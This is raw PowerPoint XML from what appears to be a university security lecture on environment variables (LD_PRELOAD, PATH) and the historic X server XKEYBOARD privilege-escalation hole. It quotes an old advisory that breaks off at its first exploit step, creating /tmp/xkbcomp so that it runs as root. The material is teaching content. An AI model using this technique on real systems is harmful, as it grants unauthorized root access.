              <a:t>RPC (see lecture on integrity of modules)</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44</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Environment variables</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Many of them modify loading or execution of a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Loading dynamic libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>LD_LIBRARY_PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>LD_PRELOAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Location of files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Not all of them must be trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Does it contain “.”?</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Example X server (xkbdir vulnerability)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Program “X” is X server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>To access the graphical HW it required root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>To make it usable by normal users it is SUID root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Anytime you execute it, it runs under root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Many command line parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>One of them is directory where the keyboard map is prepared by running a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>The script was run as root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>The script could be in any directory including /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>Prepared by the user (attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>As a result the script was run as root…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>The script could do any thing (e.g. create a SUID bash)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="21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46</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="1036638"/>
            <a:ext cx="8497888" cy="519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sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XKEYBOARD SECURITY HOLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>By: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phuzzy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> L0gik (phuzzy_l0gik@hotmail.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>==================================================================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYSTEMS AFFECTED:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>X11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Xservers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> XKEYBOARD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Just to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> paranoia, X11R6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Xservers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XKEYBOARD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>privilages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hehehe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &gt;;-) I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>came</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>across</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>months</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ago, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>seen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>writeup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> on ROOTSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, so, I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>thought</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I'd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXPLOIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=======</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ ex /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xkbcomp</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
